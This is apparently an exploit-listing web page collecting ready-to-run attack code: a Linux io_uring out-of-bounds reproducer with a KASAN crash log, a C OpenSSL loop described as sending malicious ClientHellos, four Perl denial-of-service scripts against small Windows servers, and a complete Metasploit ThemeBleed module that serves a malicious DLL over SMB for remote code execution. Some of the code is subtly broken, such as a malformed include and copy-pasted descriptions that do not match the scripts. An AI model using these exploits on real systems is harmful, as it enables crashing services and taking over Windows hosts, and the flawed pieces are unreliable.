Latest exploits :: CodePwn

<pre><code>io_uring: __io_uaddr_map() handles multi-page region dangerously __io_uaddr_map() wants to import a region from userspace, and then address the imported region through the linear mapping area. This requires that the imported region is physically contiguous. A comment in __io_uaddr_map() explains that the imported region is usually just a single page, in which case that is trivially fine. However, __io_uaddr_map() also has code intended to permit multi-page regions, in which case it tries to enforce that the entire region maps to the same folio (in other words, the same head page): /* * Should be a single page. If the ring is small enough that we can * use a normal page, that is fine. If we need multiple pages, then * userspace should use a huge page. That's the only way to guarantee * that we get contigious memory, outside of just being lucky or * (currently) having low memory fragmentation. */ if (page_array[0] != page_array[ret - 1]) goto err; This code is wrong for (more or less) two reasons: 1. It only checks the first and last page; it doesn't check any of the pages in between. Userspace can easily create a set of adjacent VMAs such that the first and last virtual page map to the same physical page, while pages in between map to entirely unrelated pages. 2. It misunderstands how compound pages are represented in the kernel, and will always reject the case it is supposed to allow: `pin_user_pages_fast()` would return a set of adjacent `struct page` instances that are associated with the same head page / folio; it wouldn't return the same `struct page *` for every subpage. Every chunk of memory of size `PAGE_SIZE` maps to its own `struct page`. So if this code is presented with a userspace region of the following shape, containing individual 4K pages: [page A] [page B] [...] [page A] then it will accept the region and assume that `page_to_virt(<page A>)` returns the address of a page as big as the entire region. Accesses to the first 4KiB of the region would work as intended; but accesses to later parts of the region will be out-of-bounds accesses to unrelated pages. Here's a reproducer that submits a bunch of NOP ops (zeroed sqes) until it overruns the end of the first sq page: ``` #define _GNU_SOURCE #include <unistd.h> #include <err.h> #include <stdio.h> #include <sys/mman.h> #include <sys/syscall.h> #include <linux/io_uring.h> #define SYSCHK(x) ({ \\ typeof(x) __res = (x); \\ if (__res == (typeof(x))-1) \\ err(1, \"SYSCHK(\" #x \")\"); \\ __res; \\ }) #define NUM_SQ_PAGES 4 int main(void) { int memfd_sq = SYSCHK(memfd_create(\"\", 0)); int memfd_cq = SYSCHK(memfd_create(\"\", 0)); SYSCHK(ftruncate(memfd_sq, NUM_SQ_PAGES * 0x1000)); SYSCHK(ftruncate(memfd_cq, NUM_SQ_PAGES * 0x1000)); // sq void *sq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_sq, 0)); SYSCHK(mmap(sq_data+(NUM_SQ_PAGES-1)*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_sq, 0)); // cq (rings) void *cq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_cq, 0)); *(volatile unsigned int *)(cq_data+4) = 64 * NUM_SQ_PAGES; for (int i=1; i<NUM_SQ_PAGES; i++) SYSCHK(mmap(cq_data+i*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_cq, 0)); struct io_uring_params params = { .flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY /*| IORING_SETUP_CQE32*/, .sq_off = { .user_addr = (unsigned long)sq_data }, .cq_off = { .user_addr = (unsigned long)cq_data } }; int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/64 * NUM_SQ_PAGES, &params)); printf(\"uring_fd = %d\ \", uring_fd); /* submit nops */ int enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 64 * NUM_SQ_PAGES, 0, 0, NULL)); printf(\"enter returned %d\ \", enter_res); } ``` It gives an ASAN splat like this (but note that the splat diagnostic is wrong because ASAN can't detect page OOB access properly): ``` [ 73.380288] ================================================================== [ 73.381745] BUG: KASAN: slab-use-after-free in io_submit_sqes+0x223/0xc00 [ 73.382822] Read of size 1 at addr ffff88810263a000 by task uring-multipage/708 [ 73.383967] [ 73.384240] CPU: 6 PID: 708 Comm: uring-multipage Not tainted 6.7.0-rc2 #357 [ 73.385316] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 [ 73.386778] Call Trace: [ 73.387177] <TASK> [ 73.387520] dump_stack_lvl+0x4a/0x80 [ 73.388117] print_report+0xcf/0x670 [...] [ 73.389595] kasan_report+0xd8/0x110 [...] [ 73.391954] io_submit_sqes+0x223/0xc00 [ 73.392570] __do_sys_io_uring_enter+0x965/0x1200 [...] [ 73.397438] do_syscall_64+0x46/0xf0 [ 73.398004] entry_SYSCALL_64_after_hwframe+0x6e/0x76 [ 73.398787] RIP: 0033:0x7ff8ed2e7989 [ 73.399494] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d d7 64 0c 00 f7 d8 64 89 01 48 [ 73.402164] RSP: 002b:00007fff76dc3598 EFLAGS: 00000202 ORIG_RAX: 00000000000001aa [ 73.403277] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff8ed2e7989 [ 73.404314] RDX: 0000000000000000 RSI: 0000000000000100 RDI: 0000000000000005 [ 73.411155] RBP: 00007fff76dc3690 R08: 0000000000000000 R09: 0000020000000100 [ 73.412496] R10: 0000000000000000 R11: 0000000000000202 R12: 000055967f6680a0 [ 73.417987] R13: 00007fff76dc3770 R14: 0000000000000000 R15: 0000000000000000 [ 73.419272] </TASK> [removed irrelevant alloc/free traces of the accessed memory region] [ 73.449202] [ 73.449471] The buggy address belongs to the object at ffff88810263a000 [ 73.449471] which belongs to the cache kmalloc-128 of size 128 [ 73.451228] The buggy address is located 0 bytes inside of [ 73.451228] freed 128-byte region [ffff88810263a000, ffff88810263a080) [ 73.453173] [ 73.453429] The buggy address belongs to the physical page: [ 73.454232] page:000000002be796b3 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10263a [ 73.455535] head:000000002be796b3 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0 [ 73.456662] flags: 0x200000000000840(slab|head|node=0|zone=2) [ 73.457522] page_type: 0xffffffff() [ 73.458045] raw: 0200000000000840 ffff8881000428c0 ffffea0004747e80 0000000000000002 [ 73.459143] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000 [ 73.460305] page dumped because: kasan: bad access detected [ 73.461091] [ 73.461353] Memory state around the buggy address: [ 73.462038] ffff888102639f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 73.463058] ffff888102639f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 73.464277] >ffff88810263a000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb [ 73.465289] ^ [ 73.465791] ffff88810263a080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc [ 73.466795] ffff88810263a100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ``` I'm not sure about the best way to fix it - since the compound page support can't actually have worked, as explained above, maybe it's easiest to just drop support for compound pages? \u03bfr alternatively we could fix that, but since nobody seems to have used it, that'd maybe be unnecessary complexity... This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-02-22. Related CVE Numbers: CVE-2023-6560. Found by: jannh@google.com </code></pre>

<pre><code>#include <stdio.h #include <string.h> #include <unistd.h> #include <openssl/ssl.h> #include <openssl/err.h> #define IP "127.0.0.1" #define PORT 5061 int main() { SSL_library_init(); SSL_load_error_strings(); OpenSSL_add_ssl_algorithms(); const SSL_METHOD *method = TLS_server_method(); SSL_CTX *ctx = SSL_CTX_new(method); if (!ctx) { fprintf(stderr, "Unable to create SSL context\n"); ERR_print_errors_fp(stderr); return 1; } SSL *ssl = SSL_new(ctx); if (!ssl) { fprintf(stderr, "Unable to create SSL\n"); ERR_print_errors_fp(stderr); return 1; } if (SSL_set_fd(ssl, fileno(stdin)) <= 0) { fprintf(stderr, "Unable to set SSL file descriptor\n"); ERR_print_errors_fp(stderr); return 1; } if (SSL_set_connect_state(ssl) <= 0) { fprintf(stderr, "Unable to set SSL connect state\n"); ERR_print_errors_fp(stderr); return 1; } const SSL_CIPHER *cipher = SSL_CIPHER_find("TLS_NULL_WITH_NULL_NULL"); if (!cipher) { fprintf(stderr, "Unable to find cipher\n"); ERR_print_errors_fp(stderr); return 1; } SSL_set_cipher_list(ssl, "TLS_NULL_WITH_NULL_NULL"); if (SSL_connect(ssl) <= 0) { fprintf(stderr, "Unable to connect\n"); ERR_print_errors_fp(stderr); return 1; } printf("Connected with cipher %s\n", SSL_CIPHER_get_name(SSL_get_current_cipher(ssl))); // Send malicious ClientHello messages continuously while (1) { if (SSL_connect(ssl) <= 0) { fprintf(stderr, "Unable to connect\n"); ERR_print_errors_fp(stderr); return 1; } sleep(1); } SSL_shutdown(ssl); SSL_free(ssl); SSL_CTX_free(ctx); EVP_cleanup(); return 0; } </code></pre>

<pre><code>#!/usr/bin/perl use IO::Socket::INET; # Exploit Title: File Sharing Wizard 1.5.0 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 07 january 2024 # Vendor Homepage: N/A # Download to demo: https://drive.google.com/file/d/13fs9IHSaGQ27YIQNDyrQV20jCT7owPQ6/view?usp=sharing # Notification vendor: No reported # Tested Version: File Sharing Wizard 1.5.0 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://drive.google.com/file/d/1gPiMU0Wemdx-rxEzAPhQCyparn1JiX0j/view?usp=sharing #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server did not properly handle request with large amounts of data via method GET to web server. #The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $exploit = "\x41"x1360; my $payload_header = "GET " . $exploit; $payload_header .= " HTTP/1.0\r\n\r\n"; my $connect = IO::Socket::INET->new( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp' ) or die "Unable to connect to the victim: $!\n"; $connect->send($payload_header); close $connect; print "[+] Done! Exploited!\n"; print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print "#################################################################\n"; print "# File Sharing Wizard 1.5.0 - Denied of Service #\n"; print "# #\n"; print "# Coded by Fernando Mengali #\n"; print "# #\n"; print "# e-mail: fernando.mengalli\@gmail.com #\n"; print "# #\n"; print "#################################################################\n"; } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } #3. Solution/ How to fix: # This version product is deprecated </code></pre>

<pre><code>#!/usr/bin/perl use IO::Socket::INET; # Exploit Title: httpdx 1.5.4 - Denied of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 06 january 2024 # Vendor Homepage: http://httpdx.sourceforge.net # Download to demo: https://sourceforge.net/projects/httpdx/files/httpdx/httpdx%201.5.4/ # Download 2 to demo:https://drive.google.com/file/d/1Slsd7qCPom4uoSPXdiONS4xh-8tp4fkV/view?usp=sharing # Notification vendor: No reported # Tested Version: httpdx 1.5.4 - Denied of Service (DoS) # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denied of Service (DoS) # Vídeo: https://drive.google.com/file/d/1hGn5AZbtVTzA_oiZPZ9yOVzIBVzKYGhQ/view?usp=sharing #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The web server does not correctly handle the amount of data or bytes sent. #When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $sock = IO::Socket::INET->new("$ip:$port"); my $exploit = "\x41"x1040; print $sock "POST /index2.html HTTP/1.0\r\n" . "Content-Length: 1023\r\n" . "Content-Type: html\r\n" . "Host: $ip" . "\r\n" . "\r\n" . $exploit; print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print q { ---------- # ------------------------------------------------------------------ --------- ##= -------------- [+] httpdx 1.5.4 - Denied of Service (DoS) ------- -------- ##=== ---------------------------------------------------------------- ------ ###==#=== -------------------------------------------------------------- ---- ####===##==== ------------------------------------------------------------ -- #####====###===== ----- Coded by Fernando Mengali ----- - #####=====####===== ----- fernando.mengalli@gmail.com ----- - #####=====####===== --------------------------------------------------------- --- ####= # #==== -------- Prepare to exploiting the server ------------ --------- ##= ----------------------------------------------------------------- ------- ####=== --------------------------------------------------------------- } } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::Remote::SMB::Server::Share def initialize(info = {}) super( update_info( info, 'Name' => 'Themebleed- Windows 11 Themes Arbitrary Code Execution CVE-2023-38146', 'Description' => %q{ When an unpatched Windows 11 host loads a theme file referencing an msstyles file, Windows loads the msstyles file, and if that file's PACKME_VERSION is `999`, it then attempts to load an accompanying dll file ending in `_vrf.dll` Before loading that file, it verifies that the file is signed. It does this by opening the file for reading and verifying the signature before opening the file for execution. Because this action is performed in two discrete operations, it opens the procedure for a time of check to time of use vulnerability. By embedding a UNC file path to an SMB server we control, the SMB server can serve a legitimate, signed dll when queried for the read, but then serve a different file of the same name when the host intends to load/execute the dll. }, 'DisclosureDate' => '2023-09-13', 'Author' => [ 'gabe_k', # Discovery/PoC 'bwatters-r7', # msf exploit 'Spencer McIntyre' # msf exploit ], 'References' => [ ['CVE', '2023-38146'], ['URL', 'https://exploits.forsale/themebleed/'], ['URL', 'https://github.com/gabe-k/themebleed/tree/main'] ], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X64, 'Targets' => [ [ 'Windows', {} ], ], 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS], 'AKA' => ['ThemeBleed'] }, 'DefaultOptions' => { 'DisablePayloadHandler' => false } ) ) register_options([ OptPath.new('STYLE_FILE', [ true, 'The Microsoft-signed .msstyles file (e.g. aero.msstyles).', '' ], regex: /.*\w*\.msstyles$/), OptString.new('STYLE_FILE_NAME', [ true, 'The name of the style file to reference.', '' ], regex: /^\w*(\.msstyles)?$/), OptString.new('THEME_FILE_NAME', [ true, 'The name of the theme file to generate.', 'exploit.theme' ]) ]) deregister_options( 'FILENAME', # this is the one used by the FILEFORMAT mixin, replaced by THEME_FILE_NAME for clarity 'FILE_NAME', # this is the one used by the SMB::Server::Share mixin, replaced by STYLE_FILE_NAME for clarity 'FOLDER_NAME' ) end def file_format_filename datastore['THEME_FILE_NAME'] end def setup super @file = File.binread(datastore['STYLE_FILE']) begin pe = Rex::PeParsey::Pe.new_from_string(@file) rescue Rex::PeParsey::PeError => e fail_with(Failure::BadConfig, "Failed to parse the STYLE_FILE: #{e}") end unless pe.resources && (rva = pe.resources['/PACKTHEM_VERSION/0/0']&.rva) fail_with(Failure::BadConfig, 'The STYLE_FILE has no PACKTHEM_VERSION resource.') end @file_version_offset = pe.rva_to_file_offset(rva) @file_name = datastore['STYLE_FILE_NAME'].blank? ? Rex::Text.rand_text_alpha(rand(4..6)) : datastore['STYLE_FILE_NAME'] @file_name << '.msstyles' unless @file_name.end_with?('.msstyles') end def primer payload_dll = generate_payload_dll max_length = [payload_dll.length, @file.length].max # make sure that the lengths are the same by padding the smaller to the length of the larger @file.ljust(max_length, "\x00".b) payload_dll.ljust(max_length, "\x00".b) virtual_disk = service.shares[@share] @service = service virtual_file = ThreadLocalVirtualStaticFile.new(virtual_disk, "/#{@file_name}_vrf.dll", @file) virtual_disk.add(virtual_file) # install this hook for create requests to set the thread-local file content virtual_disk.add_hook(RubySMB::SMB2::Packet::CreateRequest) do |_session, request| next unless request.name.read_now!.encode.ends_with?('_vrf.dll') if request.desired_access.execute == 1 virtual_file.tl_content = payload_dll else virtual_file.tl_content = @file end nil end file_create(make_theme) end def get_file_contents(client:) print_status("Sending file to #{client.peerhost}") new_version = [999].pack('v') @file[0...@file_version_offset] + new_version + @file[(@file_version_offset + new_version.length)...] end def make_theme <<~THEME [Theme] DisplayName=@%SystemRoot%\\System32\\themeui.dll,-2060 [Control Panel\\Desktop] Wallpaper=%SystemRoot%\\web\\wallpaper\\Windows\\img0.jpg TileWallpaper=0 WallpaperStyle=10 [VisualStyles] Path=\\\\#{datastore['SRVHOST']}\\#{@share}\\#{@file_name} ColorStyle=NormalColor Size=NormalSize [MasterThemeSelector] MTSM=RJSPBS THEME end class ThreadLocalVirtualStaticFile < RubySMB::Server::Share::Provider::VirtualDisk::VirtualStaticFile def initialize(*args, **kwargs) super @default_content = @content @tl_content = {} @tl_content.compare_by_identity end def open(mode = 'r', &block) @content = tl_content super end def tl_content=(content) @tl_content[Thread.current] = content end def tl_content @tl_content.fetch(Thread.current, @default_content) end end end </code></pre>

<pre><code>#!/usr/bin/perl use Net::FTP; # Exploit Title: Easy Chat Server 3.1 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 05 january 2024 # Vendor Homepage: N/A # Download to demo: https://drive.google.com/file/d/1ZbfeaWSEKlpvCG1eUtD0vNnfkNz_8PlE/view # Notification vendor: No reported # Tested Version:Easy Chat Server 3.1 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://drive.google.com/file/d/1rG6uTXTg3cTg86qmp9rh2ozQfyOV_Av7/view #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server did not properly handle request with large amounts of data via method GET to web server. #The following request sends a large amount of data to the web server to process across method GET, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $payload = "\x90" x 16; $payload = "\x41"x568; my $buffer = "GET /chat.ghp?username=" . $payload . "&password=&room=2 HTTP/1.1\r\n"; $buffer .= "User-Agent: Internet Explorer/4.0\r\n"; $buffer .= "Host: $ip:$port\r\n"; $buffer .= "Referer: http://$ip\r\n"; $buffer .= "Connection: Keep-Alive\r\n\r\n"; print("[+] Exploiting...\n"); my $socket = IO::Socket::INET->new( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', ) or die "Could not connect! Error: $!\n"; $socket->send($buffer); close($socket); print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print "#################################################################\n"; print "# Easy Chat Server 3.1 - Denied of Service #\n"; print "# #\n"; print "# Coded by Fernando Mengali #\n"; print "# #\n"; print "# e-mail: fernando.mengalli\@gmail.com #\n"; print "# #\n"; print "#################################################################\n"; } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } #3. Solution/ How to fix: # This version product is deprecated </code></pre>

<pre><code>#!/usr/bin/perl use Net::FTP; # Exploit Title: Easy File Sharing FTP Server 2.0 - Denial of Service (DoS) # Discovery by: Fernando Mengali # Discovery Date: 04 january 2024 # Download to demo: https://drive.google.com/drive/folders/1XISgBk4Zql8NzkWsrzAPOUEqbjJP4hZQ?usp=sharing # Notification vendor: No reported # Tested Version: Easy File Sharing FTP Server 2.0 # Tested on: Window XP Professional - Service Pack 2 and 3 - English # Vulnerability Type: Denial of Service (DoS) # Vídeo: https://drive.google.com/drive/folders/1XISgBk4Zql8NzkWsrzAPOUEqbjJP4hZQ?usp=sharing #1. Description #His technique works fine against Windows XP Professional Service Pack 2 and 3 (English). #For this exploit I have tried several strategies to increase reliability and performance: #Jump to a static 'call esp' #Backwards jump to code a known distance from the stack pointer. #The server does not correctly handle the amount of data or bytes of the password entered by the user. #When authenticating to the FTP server with a long password or a password with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions. #Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users. #2. Proof of Concept - PoC $sis="$^O"; if ($sis eq "windows"){ $cmd="cls"; } else { $cmd="clear"; } system("$cmd"); intro(); main(); print "[+] Exploiting... \n"; my $payload = "\x2c"; $payload .= "A"x2000; $payload .= "\x41"x610; my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@"; $ftp->login("anonymous",$payload) or die "[+] Possibly exploited!"; $ftp->quit; print "[+] Done - Exploited success!!!!!\n\n"; sub intro { print "######################################################################\n"; print "# Easy File Sharing FTP Server 2.0 - Denied of Service #\n"; print "# #\n"; print "# Coded by Fernando Mengali #\n"; print "# #\n"; print "# e-mail: fernando.mengalli\@gmail.com #\n"; print "# #\n"; print "######################################################################\n"; } sub main { our ($ip, $port) = @ARGV; unless (defined($ip) && defined($port)) { print " \nUsage: $0 <ip> <port> \n"; exit(-1); } } #3. Solution/ How to fix: # This version product is deprecated </code></pre>